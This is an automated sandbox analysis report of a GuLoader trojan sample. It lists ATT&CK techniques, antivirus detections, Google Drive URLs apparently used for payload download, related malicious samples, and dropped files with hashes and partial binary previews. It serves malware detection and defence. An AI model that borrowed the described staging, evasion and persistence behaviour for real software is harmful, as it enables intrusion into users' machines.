      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Osb7hkGfAb.exe75%ReversingLabsWin32.Trojan.GuLoader
      Osb7hkGfAb.exe68%VirustotalBrowse
      Osb7hkGfAb.exe100%AviraTR/Injector.ofxme

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.googletagmanager.co0%Avira URL Cloudsafe
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
      https://drive.go0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.184.238
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.186.97
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.googletagmanager.coOsb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E56000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://translate.google.com/translate_a/element.jsOsb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.google.com/6Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.google.com/rOsb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/lROsb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.ftp.ftp://ftp.gopher.Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.usercontent.google.com/Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://drive.usercontent.google.com/ZOsb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/xq3Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorOsb7hkGfAb.exefalse
                          		high
                          https://drive.goOsb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.google.com/BOsb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.comOsb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/ogle.co.jpOsb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdOsb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorOsb7hkGfAb.exefalse
                                    		high
                                    https://drive.google.com/Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                        		high
                                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOsb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                          		high
                                          https://drive.google.com/0hOsb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.comOsb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.com/_1Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.google.com/ificateOsb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/thOsb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://drive.google.com/#/bOsb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.184.238
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.250.186.97
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1587621
                                                      Start date and time:2025-01-10 15:59:56 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 42s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Osb7hkGfAb.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
                                                      Detection:MAL
                                                      Classification:mal76.troj.evad.winEXE@3/8@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 88%
                                                      • Number of executed functions: 46
                                                      • Number of non-executed functions: 28
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238
                                                      zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                      • 142.250.186.97
                                                      • 142.250.184.238

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dllSvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                        fbXZ4ErQMU.exeGet hashmaliciousGuLoaderBrowse
                                                          fbXZ4ErQMU.exeGet hashmaliciousUnknownBrowse
                                                            dIPYIbWXs1.exeGet hashmaliciousUnknownBrowse
                                                              dIPYIbWXs1.exeGet hashmaliciousGuLoaderBrowse
                                                                eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                                  eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                                    RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11776
                                                                        Entropy (8bit):5.854450882766351
                                                                        Encrypted:false
                                                                        SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                                        MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                                        SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                                        SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                                        SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: SvmL9tW29w.exe, Detection: malicious, Browse
                                                                        • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                        • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                        • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                                        • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\tranchet\Choriambic.Can

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):210620
                                                                        Entropy (8bit):7.5479608224177
                                                                        Encrypted:false
                                                                        SSDEEP:3072:TxsXh+JF13htt8PqX5tMt86Z3XfXA2QqtG0i3xDW4+E/lXSIjfOxVaXm2:TKXS1x70vXbDGNMGxScOHa1
                                                                        MD5:87B5C774E173976A2E28F1BA83D0AF19
                                                                        SHA1:84F517D61D4108AF7970FD480EF38F84C69508DD
                                                                        SHA-256:D3ADC7A77CF3BED6B58380322BE620D613085797830847ACEF8BAC9B88E14F7A
                                                                        SHA-512:D3AAFC404CF4F24AC2A75B0EFB3F815D7B53A3B96132122B490531B488BF04FF4AE5444744FDE22C14B8DCD943AA82AE77350A0247D705C08485D7A1C26AB5F7
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...r.....R....pp..FF.........i...a......................v....R......R..###........................*...................c. ......................o........U................................,..............D......................wwww.....+..$....h...HH............FF.........&...KKKKKK..D............m......_..).l..".......R..L....[.............$.........y.y....t................444............D...........2.&&...~.z.......TT...EEEE.l..........VVVV..F...........................__..........+...>>.........xxx...c.k........1............rrrr............{{..............l........................j........................_...mm.........j...........*.............FFFFF..................;;;....zz....................................M............6.......@....'.......$...................;..........<<..........,....I..............Y...999.......................`......@..ff.................................................]....................tt.......`.....v..............|||./........vv.E.qq.. ....O..........{

                                                                        C:\Users\user\tranchet\Dziggetai.Out

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):441234
                                                                        Entropy (8bit):2.643055597561025
                                                                        Encrypted:false
                                                                        SSDEEP:1536:QZmWsnh5l4WzxPFhMOzNJoDb8glX1rYrkbN39D8e7A7Sg2gGqAXr2bHLopKRJ8No:ot0r3reuPrpL/7zB7nMWi0FThhJtG4
                                                                        MD5:B3702DCDA1481DA4539338C0B2D6E4EB
                                                                        SHA1:40A2001A107BE6C3D4587D8E5FF5FAEFA6C61A1B
                                                                        SHA-256:F2F2395066AB9072911FC0D46DAA8DFB2C7AEFB30BE7DAB9B7BBDC7583B9A94F
                                                                        SHA-512:AAB912267A32EA594A37BFB57F002AB8340C2CD94C2EB21E37ECE375F899D01207C48E8BF9429FB7CC302E5F17D8F8DF17EA208450D26F416A0372D2BCA245AE
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:0000000037009E9E9E0000008F8F00ECEC00D9000000000000ABAB00A0000000008000006E00313131000D0D0D006464006E000E0E000000E4000000C6000000E200000021000000000000D2D2000032002F2F004500000000EAEAEA0000E50000717100EEEE001100CCCCCCCCCCCCCC00B7B7B70000FCFC0000000000000000B7B7B7B7B7B700BDBD00B7000044444400007C00660000000000830000808080800000282800DF003900D2006666001F00970000AAAA00FE000000B9009E9E9E9E9E002B00000000003C00008F8F8F000400010101000083004900004100004300000000E700001D1D0000000707070700000000004C000000161616000000DDDDDDDD005B5B00006200B7B7B7B700000000CE00000000FD000000BDBD000043008F8F8F8F00005F5F002600A6005C5C007474747400A2A2A2A2A20000E9E9007979797979790000B100000000004200001C000000240000D4000000A800E00000000000000018000000620000001A1A1A00E8000000999999990000000000383838383838005555000057570000AD00003838380000000000797900000000001A1A000045000002020202020200CBCB0000F700EE005700C0C0000000004E4E00004646464646003D00191919000000000000EFEFEFEF000046460000410065650000DEDEDE00000000005E0000010030303030

                                                                        C:\Users\user\tranchet\computerskrmen.dem

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):485127
                                                                        Entropy (8bit):1.2565961974341746
                                                                        Encrypted:false
                                                                        SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                                        MD5:580D05E679E74B036B55CA8E5FF32769
                                                                        SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                                        SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                                        SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                                        Malicious:false
                                                                        Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............

                                                                        C:\Users\user\tranchet\predictors.dut

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):389868
                                                                        Entropy (8bit):1.2469892412772452
                                                                        Encrypted:false
                                                                        SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                                        MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                                        SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                                        SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                                        SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                                        Malicious:false
                                                                        Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................

                                                                        C:\Users\user\tranchet\receptionssekretrer.bin

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):442363
                                                                        Entropy (8bit):1.2533707838755617
                                                                        Encrypted:false
                                                                        SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                                        MD5:5465B75724C031B21C018F7D72941F72
                                                                        SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                                        SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                                        SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                                        Malicious:false
                                                                        Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................

                                                                        C:\Users\user\tranchet\serenissimi.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):521
                                                                        Entropy (8bit):4.284169749449499
                                                                        Encrypted:false
                                                                        SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                                        MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                                        SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                                        SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                                        SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                                        Malicious:false
                                                                        Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.

                                                                        C:\Windows\Arder.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):720
                                                                        Entropy (8bit):3.2583835496355245
                                                                        Encrypted:false
                                                                        SSDEEP:12:8wl0bsXyllEzKYGlnEEkvEEv3w/g/iCNJkKAP4t2YZ/elFlSJm:8s2CzKJvs+/4i2HAFqy
                                                                        MD5:1DD416959B3A61611C699B9C51E589D0
                                                                        SHA1:6C955BC97130A942608C2525257E2E877CFBFAF9
                                                                        SHA-256:FB67473E5157A26E60B1C53C81948DEDCBBAEC23B68E2B17CD335A7830FD963F
                                                                        SHA-512:3DD9311979FA9471D46B0FFA8D81B5191BBE753ED0115484E11FB0C812B313C6CF87109D567BB4AA7DDBC52F9F453308C910394D831C6A6FA2127A56A96FDFFA
                                                                        Malicious:false
                                                                        Preview:L..................F........................................................9....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.b.r.o.k.\.D.i.s.a.n.n.e.x...A.n.d.3.7.".C.:.\.U.s.e.r.s.\.b.r.o.k.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                        Static File Info

                                                                        General

